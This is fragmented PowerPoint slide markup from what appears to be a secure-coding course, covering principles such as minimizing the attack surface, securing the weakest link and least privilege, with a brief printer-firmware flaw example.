              <a:rPr sz="1999" spc="3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30" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Each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entry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point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requires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protection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(more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code)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55"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="3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30" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Each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entry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point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is a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focus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point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attacker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60"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="2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20" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Entry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points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be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reduces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limiting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privileged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users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76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639013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0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5" dirty="0"/>
              <a:t>Minimize</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-10" dirty="0"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-10" dirty="0"/>
              <a:t>Attack</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-10" dirty="0"/>
              <a:t>Surface</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="25" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="5" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Tips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0"/>
            <a:ext cx="4191178" cy="3231308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Attack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Points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UI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60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orms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iel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-1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TP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hea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kies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API's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 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tions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gin/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ut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ati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n's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nter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wit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ot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sy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tems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Datab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inter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Admin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inter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77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639013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0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5" dirty="0"/>
              <a:t>Minimize</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-10" dirty="0"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-10" dirty="0"/>
              <a:t>Attack</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-10" dirty="0"/>
              <a:t>Surface</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="25" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="5" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Tips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10169416" cy="4069925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Attack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Surface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modeled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scanner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ZA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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-4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x</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-200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urp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P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40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x</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-200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w3a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-170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4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hni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Prioritize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risk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each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attack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point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Netw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acing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entr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ints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Clien</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-5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-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sid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we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orms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Externa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files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Backward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compatible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interfaces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old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code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interfaces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Custom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API's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code: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encryption,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authentication,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authorization,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session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5078" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2589"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="85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Attempt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 reduce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risk to the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application by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reducing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attack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points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risk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at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each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point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648" y="668993"/>
            <a:ext cx="10512862" cy="12536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99">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="90143">
              <a:spcBef>
                <a:spcPts val="2714"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2699" spc="-5" dirty="0"/>
              <a:t>Creating</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-5" dirty="0"/>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-5" dirty="0"/>
              <a:t>Code</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-10" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-25" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-5" dirty="0"/>
              <a:t>Principles</a:t>
            </a:r>
            <a:endParaRPr sz="2699"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1253417" y="2639427"/>
            <a:ext cx="3470641" cy="2737472"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="35551" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12696" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="280"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2399" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E5496"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Secure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By</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399" spc="-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Design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6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Establish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Boundaries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6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Don't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Reinvent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Wheel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7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Economy</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="199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Mechanism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55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199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Reluctance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55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Open</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-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Design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70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Minimize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Attack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Surface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indent="-342797" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="155"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354859" algn="l"/>
                <a:tab pos="355493" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-3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srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-1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1999" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Weakest</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-4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srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Link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5759" y="205816"/>
            <a:ext cx="8638830" cy="7072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12697" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="90778" marR="3069939">
              <a:lnSpc>
                <a:spcPts val="2699"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Common</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="15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35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10" dirty="0"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="5" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-25" dirty="0"/>
              <a:t>Weakest</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Link</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="40" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="15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10244327" cy="1417586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Principle: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Attackers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will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attack</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="23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weakest</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="23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point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application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Corollary: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valid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coding outcome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encouraging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attacker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go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after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someone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else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Corollary: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chain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strong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weakest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link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700" y="3827042"/>
            <a:ext cx="10307810" cy="1727385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235514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Adversaries</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="23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will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expend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 least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amount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effort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possible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penetrate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1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wi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wor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ha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der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 n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ary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5078" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2379"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="42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they have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work too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hard,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they may move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 to another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target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(depending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how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attractive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asset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is)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6232" y="2121748"/>
            <a:ext cx="3009116" cy="169577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70266" y="6275192"/>
            <a:ext cx="5390381" cy="166028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12696" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pP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Image</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="2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courtesy</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="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</a:rPr>
              <a:t>of:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="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Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.businessearth.com/wp-content/uploads/supply_chain_sustainability.jpg</a:t>
            </a:r>
            <a:endParaRPr sz="10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79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2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2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80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4943896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5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10" dirty="0"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="5" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-25" dirty="0"/>
              <a:t>Weakest</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Link</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="45" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="15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0"/>
            <a:ext cx="8654066" cy="4065481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279316" indent="-266620" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="254"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="278681" algn="l"/>
                <a:tab pos="279316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Threat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Models will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lead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weakest</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="23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areas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iating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wea</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-40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ri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wi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al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new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wea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link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Attackers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will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after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weakest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links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simply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because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easy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65"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="3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30" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>They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looking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19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foothold</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="19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or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information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use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Factor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the four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sources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threats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ial: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ple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Operational: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Processes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(and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People)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Technological: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application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network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5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vi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onme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tal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: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10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acilities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Which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threat sources are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more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likely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weak?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81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4943896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5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10" dirty="0"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="5" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-25" dirty="0"/>
              <a:t>Weakest</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Link</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="45" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="15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6059497" cy="2878975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attacker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will look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weaknesses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Default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settings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application or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servers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23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ser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eles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netw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rk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old ba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ku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ser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ple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 are ne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ligent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i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-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ormed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pen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fi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ser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82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4943896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5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5" dirty="0"/>
              <a:t>Coding</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="3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10" dirty="0"/>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="10" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-10" dirty="0"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="5" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-25" dirty="0"/>
              <a:t>Weakest</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Link</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="45" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="15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0"/>
            <a:ext cx="10277338" cy="2503788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HP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Printers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using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Jetdirect firmware</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="23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include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embedded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web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server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lows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35" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>f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em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admi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ist</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-4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ati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vi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1025217" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2379"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4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Due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 an undisclosed design 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flaw,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 server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handles passwords in an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insecure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manner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9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Attacker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gain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unauthorized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device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 also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create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denial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service.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Networked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printers,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general,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poorly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secured.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83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Common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Coding</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="3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the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25" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E5496"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Weakest</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="2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Link</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="4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–</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="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Security</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="2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Design</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="3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20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E5496"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Pattern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267123"/>
            <a:ext cx="9873583" cy="2900559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Alias: Low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Hanging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Fruit,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Quick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Wins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Development</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199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timelines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my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prohibit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fully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design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5078" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2379"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4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 skills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required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properly secure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applications might not be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immediately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available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9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adequate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testing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environment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new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tools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procedures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may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available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Inadequate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training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my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lead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weaknesses</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="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operational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social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threats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84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Common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Coding</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="3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the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25" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E5496"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Weakest</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="2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Link</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="4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–</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="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Security</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="2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Design</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="3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20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E5496"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Pattern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9447609" cy="2123522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Consequences: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Effort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focused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where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will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most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good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5078" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2379"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4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 application,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servers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system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begin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operation with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acceptable,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minimum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level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protection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9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Applications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left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exposed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trivial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attacks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vulnerabilities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Basic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troubleshooting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auditing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trails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enabled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9258" y="5153718"/>
            <a:ext cx="1295063" cy="12463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5639013">
              <a:lnSpc>
                <a:spcPts val="2699"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="540"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Common</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="10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10" dirty="0"/>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="5" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-10" dirty="0"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="5" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-25" dirty="0"/>
              <a:t>Weakest</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Link</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="40" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="10" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Tips</a:t>
            </a:r>
            <a:endParaRPr sz="2499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85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916700" y="1267123"/>
            <a:ext cx="7920832" cy="3351292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Use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Threat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Models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understand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attack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surface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Make sure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don't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ignore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operational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social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threats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65" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Test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application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thoroughly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 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tes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plan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Red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40" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Teaming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and/or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third-party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audits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5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65" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Test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all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obvious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vulnerabilities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0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="3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35" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="19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Injection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70"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="3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30" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>XSS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5"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="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Authentication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Bypass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648" y="668993"/>
            <a:ext cx="10512862" cy="12536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99">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="90143">
              <a:spcBef>
                <a:spcPts val="2714"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2699" spc="-5" dirty="0"/>
              <a:t>Creating</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-5" dirty="0"/>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-5" dirty="0"/>
              <a:t>Code</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-10" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-25" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-5" dirty="0"/>
              <a:t>Principles</a:t>
            </a:r>
            <a:endParaRPr sz="2699"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1253418" y="2662754"/>
            <a:ext cx="3082122" cy="146964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23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399" spc="-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By</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399" spc="-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Default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2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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Use</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2249" spc="-4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srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Least</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2249" spc="-6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srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Privilege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Use</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="224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Default</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2249" spc="-6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Deny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0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30" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Fail</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="224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Securely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87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 Coding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Use</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="-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Least</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="1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Privilege-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Introduction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335315"/>
            <a:ext cx="10278608" cy="3972160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="49517" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="181556" marR="664646" indent="-169494" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2379"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="390"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="5B9BD4"/>
              </a:buClr>
              <a:buSzPct val="109090"/>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="182190" algn="l"/>
              </a:tabLst>
            </a:pP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Principle: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subject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only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granted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only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privileges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needed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 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-67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operation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483089" marR="185999" indent="-169494" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2159"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1445"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2199" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5B9BD4"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>o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Corollary:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="19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Privileges</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="19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associated</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="199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19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function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being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performed,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="19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with </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-6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identity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71733" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2589"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="80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Least Privilege is a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concept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means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at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any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given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application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state,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 user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will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operate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at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lowest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level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of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3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rights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possible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5078" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2589"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="80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program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should be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given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only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those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privileges it needs in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order to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satisfy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its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requirements—no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more,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no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less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05"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2199" spc="40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program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doesn’t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need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right,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granted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right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15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Think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“need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know”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rule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20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Thus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program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compromised,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damage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limited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88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6382375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spc="760" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Coding</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="77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5" dirty="0"/>
              <a:t>Use</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Least</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="10" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Privilege-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="10" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Example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10079270" cy="3675058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example,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When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accessing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database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behalf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unprivileged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65" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>user,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database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account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will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have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only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privileges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necessary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50"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="2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2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only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required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databases</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="19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tables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defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="170"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="20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999" spc="2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19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9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dirty="0">
                <a:solidFill>
